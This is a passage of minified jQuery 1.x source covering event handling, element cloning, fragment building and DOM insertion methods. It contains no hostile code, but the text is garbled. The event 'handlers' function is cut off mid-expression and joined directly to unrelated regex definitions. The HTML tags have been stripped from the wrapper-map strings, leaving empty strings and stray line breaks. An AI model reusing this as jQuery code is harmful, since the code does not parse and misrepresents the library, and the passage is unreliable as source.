0:m.event.dispatch.apply(k.elem,arguments)},k.elem=a),b=(b||"").match(E)||[""],h=b.length;while(h--)f=_.exec(b[h])||[],o=q=f[1],p=(f[2]||"").split(".").sort(),o&&(j=m.event.special[o]||{},o=(e?j.delegateType:j.bindType)||o,j=m.event.special[o]||{},l=m.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&m.expr.match.needsContext.test(e),namespace:p.join(".")},i),(n=g[o])||(n=g[o]=[],n.delegateCount=0,j.setup&&j.setup.call(a,d,p,k)!==!1||(a.addEventListener?a.addEventListener(o,k,!1):a.attachEvent&&a.attachEvent("on"+o,k))),j.add&&(j.add.call(a,l),l.handler.guid||(l.handler.guid=c.guid)),e?n.splice(n.delegateCount++,0,l):n.push(l),m.event.global[o]=!0);a=null}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m.hasData(a)&&m._data(a);if(r&&(k=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=_.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=m.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,n=k[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),i=f=n.length;while(f--)g=n[f],!e&&q!==g.origType||c&&c.guid!==g.guid||h&&!h.test(g.namespace)||d&&d!==g.selector&&("**"!==d||!g.selector)||(n.splice(f,1),g.selector&&n.delegateCount--,l.remove&&l.remove.call(a,g));i&&!n.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||m.removeEvent(a,o,r.handle),delete k[o])}else for(o in k)m.event.remove(a,o+b[j],c,d,!0);m.isEmptyObject(k)&&(delete r.handle,m._removeData(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,l,n,o=[d||y],p=j.call(b,"type")?b.type:b,q=j.call(b,"namespace")?b.namespace.split("."):[];if(h=l=d=d||y,3!==d.nodeType&&8!==d.nodeType&&!$.test(p+m.event.triggered)&&(p.indexOf(".")>=0&&(q=p.split("."),p=q.shift(),q.sort()),g=p.indexOf(":")<0&&"on"+p,b=b[m.expando]?b:new m.Event(p,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=q.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:m.makeArray(c,[b]),k=m.event.special[p]||{},e||!k.trigger||k.trigger.apply(d,c)!==!1)){if(!e&&!k.noBubble&&!m.isWindow(d)){for(i=k.delegateType||p,$.test(i+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),l=h;l===(d.ownerDocument||y)&&o.push(l.defaultView||l.parentWindow||a)}n=0;while((h=o[n++])&&!b.isPropagationStopped())b.type=n>1?i:k.bindType||p,f=(m._data(h,"events")||{})[b.type]&&m._data(h,"handle"),f&&f.apply(h,c),f=g&&h[g],f&&f.apply&&m.acceptData(h)&&(b.result=f.apply(h,c),b.result===!1&&b.preventDefault());if(b.type=p,!e&&!b.isDefaultPrevented()&&(!k._default||k._default.apply(o.pop(),c)===!1)&&m.acceptData(d)&&g&&d[p]&&!m.isWindow(d)){l=d[g],l&&(d[g]=null),m.event.triggered=p;try{d[p]()}catch(r){}m.event.triggered=void 0,l&&(d[g]=l)}return b.result}},dispatch:function(a){a=m.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(m._data(this,"events")||{})[a.type]||[],k=m.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=m.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,g=0;while((e=f.handlers[g++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(e.namespace))&&(a.handleObj=e,a.data=e.data,c=((m.event.special[e.origType]||{}).handle||e.handler).apply(f.elem,i),void 0!==c&&(a.result=c)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!=this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(e=[],f=0;h>f;f++)d=b[f],c=d.selector+" ",void 0===e[c]&&(e[c]=d.needsContext?m(c,this).index(i)>=0:m.find(c,this,null,[i]).length),e[c]&&e.push(d);e.length&&g.push({elem:i,handlers:e})}return h]","i"),hb=/^\s+/,ib=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,jb=/<([\w:]+)/,kb=/\s*$/g,rb={option:[1,""],legend:[1,"
","
"],area:[1,"",""],param:[1,"",""],thead:[1,"","
"],tr:[2,"","
"],col:[2,"","
"],td:[3,"","
"],_default:k.htmlSerialize?[0,"",""]:[1,"X
","
"]},sb=db(y),tb=sb.appendChild(y.createElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b||"*"):typeof a.querySelectorAll!==K?a.querySelectorAll(b||"*"):void 0;if(!f)for(f=[],c=a.childNodes||a;null!=(d=c[e]);e++)!b||m.nodeName(d,b)?f.push(d):m.merge(f,ub(d,b));return void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function xb(a){return a.type=(null!==m.find.attr(a,"type"))+"/"+a.type,a}function yb(a){var b=pb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function zb(a,b){for(var c,d=0;null!=(c=a[d]);d++)m._data(c,"globalEval",!b||m._data(b[d],"globalEval"))}function Ab(a,b){if(1===b.nodeType&&m.hasData(a)){var c,d,e,f=m._data(a),g=m._data(b,f),h=f.events;if(h){delete g.handle,g.events={};for(c in h)for(d=0,e=h[c].length;e>d;d++)m.event.add(b,c,h[c][d])}g.data&&(g.data=m.extend({},g.data))}}function Bb(a,b){var c,d,e;if(1===b.nodeType){if(c=b.nodeName.toLowerCase(),!k.noCloneEvent&&b[m.expando]){e=m._data(b);for(d in e.events)m.removeEvent(b,d,e.handle);b.removeAttribute(m.expando)}"script"===c&&b.text!==a.text?(xb(b).text=a.text,yb(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):"input"===c&&W.test(a.type)?(b.defaultChecked=b.checked=a.checked,b.value!==a.value&&(b.value=a.value)):"option"===c?b.defaultSelected=b.selected=a.defaultSelected:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!gb.test("<"+a.nodeName+">")?f=a.cloneNode(!0):(tb.innerHTML=a.outerHTML,tb.removeChild(f=tb.firstChild)),!(k.noCloneEvent&&k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||m.isXMLDoc(a)))for(d=ub(f),h=ub(a),g=0;null!=(e=h[g]);++g)d[g]&&Bb(e,d[g]);if(b)if(c)for(h=h||ub(a),d=d||ub(f),g=0;null!=(e=h[g]);g++)Ab(e,d[g]);else Ab(a,f);return d=ub(f,"script"),d.length>0&&zb(d,!i&&ub(a,"script")),d=h=e=null,f},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,l,n=a.length,o=db(b),p=[],q=0;n>q;q++)if(f=a[q],f||0===f)if("object"===m.type(f))m.merge(p,f.nodeType?[f]:f);else if(lb.test(f)){h=h||o.appendChild(b.createElement("div")),i=(jb.exec(f)||["",""])[1].toLowerCase(),l=rb[i]||rb._default,h.innerHTML=l[1]+f.replace(ib,"<$1>")+l[2],e=l[0];while(e--)h=h.lastChild;if(!k.leadingWhitespace&&hb.test(f)&&p.push(b.createTextNode(hb.exec(f)[0])),!k.tbody){f="table"!==i||kb.test(f)?""!==l[1]||kb.test(f)?0:h:h.firstChild,e=f&&f.childNodes.length;while(e--)m.nodeName(j=f.childNodes[e],"tbody")&&!j.childNodes.length&&f.removeChild(j)}m.merge(p,h.childNodes),h.textContent="";while(h.firstChild)h.removeChild(h.firstChild);h=o.lastChild}else p.push(b.createTextNode(f));h&&o.removeChild(h),k.appendChecked||m.grep(ub(p,"input"),vb),q=0;while(f=p[q++])if((!d||-1===m.inArray(f,d))&&(g=m.contains(f.ownerDocument,f),h=ub(o.appendChild(f),"script"),g&&zb(h),c)){e=0;while(f=h[e++])ob.test(f.type||"")&&c.push(f)}return h=null,o},cleanData:function(a,b){for(var d,e,f,g,h=0,i=m.expando,j=m.cache,l=k.deleteExpando,n=m.event.special;null!=(d=a[h]);h++)if((b||m.acceptData(d))&&(f=d[i],g=f&&j[f])){if(g.events)for(e in g.events)n[e]?m.event.remove(d,e):m.removeEvent(d,e,g.handle);j[f]&&(delete j[f],l?delete d[i]:typeof d.removeAttribute!==K?d.removeAttribute(i):d[i]=null,c.push(f))}}}),m.fn.extend({text:function(a){return V(this,function(a){return void 0===a?m.text(this):this.empty().append((this[0]&&this[0].ownerDocument||y).createTextNode(a))},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?m.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||m.cleanData(ub(c)),c.parentNode&&(b&&m.contains(c.ownerDocument,c)&&zb(ub(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++){1===a.nodeType&&m.cleanData(ub(a,!1));while(a.firstChild)a.removeChild(a.firstChild);a.options&&m.nodeName(a,"select")&&(a.options.length=0)}return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return m.clone(this,a,b)})},html:function(a){return V(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a)return 1===b.nodeType?b.innerHTML.replace(fb,""):void 0;if(!("string"!=typeof a||mb.test(a)||!k.htmlSerialize&&gb.test(a)||!k.leadingWhitespace&&hb.test(a)||rb[(jb.exec(a)||["",""])[1].toLowerCase()])){a=a.replace(ib,"<$1>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(m.cleanData(ub(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,m.cleanData(ub(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,n=this,o=l-1,p=a[0],q=m.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&nb.test(p))return this.each(function(c){var d=n.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(i=m.buildFragment(a,this[0].ownerDocument,!1,this),c=i.firstChild,1===i.childNodes.length&&(i=c),c)){for(g=m.map(ub(i,"script"),xb),f=g.length;l>j;j++)d=i,j!==o&&(d=m.clone(d,!0,!0),f&&m.merge(g,ub(d,"script"))),b.call(this[j],d,j);if(f)for(h=g[g.length-1].ownerDocument,m.map(g,yb),j=0;f>j;j++)d=g[j],ob.test(d.type||"")&&!m._data(d,"globalEval")&&m.contains(h,d)&&(d.src?m._evalUrl&&m._evalUrl(d.src):m.globalEval((d.text||d.textContent||d.innerHTML||"").replace(qb,"")));i=c=null}return this}}),m.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){m.fn[a]=function(a){for(var c,d=0,e=[],g=m(a),h=g.length-1;h>=d;d++)c=d===h?this:this.clone(!0),m(g[d])[b](c),f.apply(e,c.get());return this.pushStack(e)}});var Cb,Db={};function Eb(b,c){var d,e=m(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:m.css(e[0],"display");return e.detach(),f}function Fb(a){var b=y,c=Db[a];return c||(c=Eb(a,b),"none"!==c&&c||(Cb=(Cb||m("